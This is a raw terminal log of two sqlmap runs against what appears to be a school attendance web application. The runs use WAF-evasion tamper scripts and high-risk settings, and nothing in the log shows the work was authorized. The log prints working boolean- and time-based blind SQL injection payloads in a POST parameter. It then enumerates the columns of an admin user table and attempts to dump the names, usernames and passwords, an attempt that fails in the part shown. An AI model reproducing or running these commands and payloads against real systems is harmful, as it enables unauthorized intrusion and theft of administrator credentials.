python sqlmap.py -r akademik.txt --identify-waf --random-agent --tamper="between,randomcase,space2comment" --level=5 --risk=3 --string="Anda" -D absensi -T adminuser --columns --batch --threads=10 --fresh-queries
___
H
___ ["]__ ___ ___ {1.3.4#stable}
|_ -| . [)] | .'| . |
|| ["]|||__,| |
||V... || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:55:10 /2021-11-14/
[20:55:10] [INFO] parsing HTTP request from 'akademik.txt'
[20:55:10] [INFO] loading tamper module 'between'
[20:55:10] [INFO] loading tamper module 'randomcase'
[20:55:10] [INFO] loading tamper module 'space2comment'
[20:55:11] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080924 Ubuntu/8.04 (hardy) Firefox/2.0.0.17' from file '/home/kali/sqlmap-1.3.4/txt/user-agents.txt'
custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[20:55:11] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:55:11] [INFO] testing connection to the target URL
[20:55:12] [INFO] heuristics detected web page charset 'ascii'
[20:55:12] [INFO] testing if the provided string is within the target URL page content
[20:55:13] [INFO] using WAF scripts to detect backend WAF/IPS protection
[20:55:16] [WARNING] WAF/IPS product hasn't been identified
sqlmap resumed the following injection point(s) from stored session:
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: thnakademik=2021/2022' AND 1170=1170-- cywK&tokenid=1b503a83f847f4e4ebe28769d12a8fe8485c0954
Type: time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: thnakademik=2021/2022' AND 9655=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- YzNx&tokenid=1b503a83f847f4e4ebe28769d12a8fe8485c0954
[20:55:16] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[20:55:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Linux Ubuntu
web application technology: Apache, PHP 5.5.9
back-end DBMS: Microsoft SQL Server 2000
[20:55:16] [INFO] fetching columns for table 'adminuser' in database 'absensi'
[20:55:16] [INFO] retrieved: 10
[20:55:21] [INFO] retrieving the length of query output
[20:55:21] [INFO] retrieved: 5
[20:55:35] [INFO] retrieved: Aktif
[20:55:35] [INFO] retrieving the length of query output
[20:55:35] [INFO] retrieved: 3
[20:55:45] [INFO] retrieved: int
[20:55:45] [INFO] retrieving the length of query output
[20:55:45] [INFO] retrieved: 2
[20:55:55] [INFO] retrieved: FA
[20:55:55] [INFO] retrieving the length of query output
[20:55:55] [INFO] retrieved: 3
[20:56:05] [INFO] retrieved: int
[20:56:05] [INFO] retrieving the length of query output
[20:56:05] [INFO] retrieved: 3
[20:56:08] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[20:56:08] [WARNING] unexpected HTTP code '200' detected. Will use (extra) validation step in similar cases
[20:56:15] [INFO] retrieved: FHA
[20:56:15] [INFO] retrieving the length of query output
[20:56:15] [INFO] retrieved: 3
[20:56:25] [INFO] retrieved: int
[20:56:25] [INFO] retrieving the length of query output
[20:56:25] [INFO] retrieved: 3
[20:56:37] [INFO] retrieved: FUA
[20:56:37] [INFO] retrieving the length of query output
[20:56:37] [INFO] retrieved: 3
[20:56:46] [INFO] retrieved: int
[20:56:46] [INFO] retrieving the length of query output
[20:56:46] [INFO] retrieved: 10
[20:57:16] [INFO] retrieved: IP_Address
[20:57:16] [INFO] retrieving the length of query output
[20:57:16] [INFO] retrieved: 7
[20:57:34] [INFO] retrieved: varchar
[20:57:34] [INFO] retrieving the length of query output
[20:57:34] [INFO] retrieved: 6
[20:57:52] [INFO] retrieved: Jadwal
[20:57:52] [INFO] retrieving the length of query output
[20:57:52] [INFO] retrieved: 3
[20:58:02] [INFO] retrieved: int
[20:58:02] [INFO] retrieving the length of query output
[20:58:02] [INFO] retrieved: 10
[20:58:30] [INFO] retrieved: Last_Login
[20:58:30] [INFO] retrieving the length of query output
[20:58:30] [INFO] retrieved: 7
[20:58:47] [INFO] retrieved: varchar
[20:58:47] [INFO] retrieving the length of query output
[20:58:47] [INFO] retrieved: 12
[20:59:18] [INFO] retrieved: Name
[20:59:18] [INFO] retrieving the length of query output
[20:59:18] [INFO] retrieved: 7
[20:59:35] [INFO] retrieved: varchar
[20:59:35] [INFO] retrieving the length of query output
[20:59:35] [INFO] retrieved: 9
[20:59:57] [INFO] retrieved: Name_User
[20:59:57] [INFO] retrieving the length of query output
[20:59:57] [INFO] retrieved: 7
[21:00:16] [INFO] retrieved: varchar
[21:00:16] [INFO] retrieving the length of query output
[21:00:16] [INFO] retrieved: 8
[21:00:36] [INFO] retrieved: Password
[21:00:36] [INFO] retrieving the length of query output
[21:00:36] [INFO] retrieved: 7
[21:00:53] [INFO] retrieved: varchar
Database: absensi
Table: adminuser
[10 columns]
+--------------+---------+
| Column | Type |
+--------------+---------+
| Aktif | int |
| FA | int |
| FHA | int |
| FUA | int |
| IP_Address | varchar |
| Jadwal | int |
| Last_Login | varchar |
| Name | varchar |
| Name_User | varchar |
| Password | varchar |
+--------------+---------+
[21:00:53] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times, 404 (Not Found) - 1 times
[21:00:53] [INFO] fetched data logged to text files under '/output/www.website.com'
python sqlmap.py -r akademik.txt --identify-waf --random-agent --tamper="between,randomcase,space2comment" --level=5 --risk=3 --string="Anda" -D absensi -T adminuser -C Name,Name_User,Password --dump --batch --threads=10 --fresh-queries
___
H
___ [.]__ ___ ___ {1.3.4#stable}
|_ -| . [.] | .'| . |
|| [,]|||__,| |
||V... || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:06:52 /2021-11-14/
[21:06:52] [INFO] parsing HTTP request from 'akademik.txt'
[21:06:52] [INFO] loading tamper module 'between'
[21:06:52] [INFO] loading tamper module 'randomcase'
[21:06:52] [INFO] loading tamper module 'space2comment'
[21:06:52] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5' from file '/home/kali/sqlmap-1.3.4/txt/user-agents.txt'
custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[21:06:53] [INFO] resuming back-end DBMS 'microsoft sql server'
[21:06:53] [INFO] testing connection to the target URL
[21:06:54] [INFO] heuristics detected web page charset 'ascii'
[21:06:54] [INFO] testing if the provided string is within the target URL page content
[21:06:55] [INFO] using WAF scripts to detect backend WAF/IPS protection
[21:06:57] [WARNING] WAF/IPS product hasn't been identified
sqlmap resumed the following injection point(s) from stored session:
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: thnakademik=2021/2022' AND 1170=1170-- cywK&tokenid=1b503a83f847f4e4ebe28769d12a8fe8485c0954
Type: time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: thnakademik=2021/2022' AND 9655=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- YzNx&tokenid=1b503a83f847f4e4ebe28769d12a8fe8485c0954
[21:06:57] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:06:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Linux Ubuntu
web application technology: Apache, PHP 5.5.9
back-end DBMS: Microsoft SQL Server 2000
[21:06:57] [INFO] fetching entries of column(s) 'Name, Name_User, Password' for table 'adminuser' in database 'absensi'
[21:06:57] [INFO] fetching number of column(s) 'Name, Name_User, Password' entries for table 'adminuser' in database 'absensi'
[21:06:58] [INFO] retrieved:
[21:06:59] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[21:06:59] [WARNING] time-based comparison requires larger statistical model, please wait......................... (done)
[21:07:15] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[21:07:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:07:16] [WARNING] unable to retrieve the number of column(s) 'Name, Name_User, Password' entries for table 'adminuser' in database 'absensi'
[21:07:16] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[21:07:16] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/www.website.com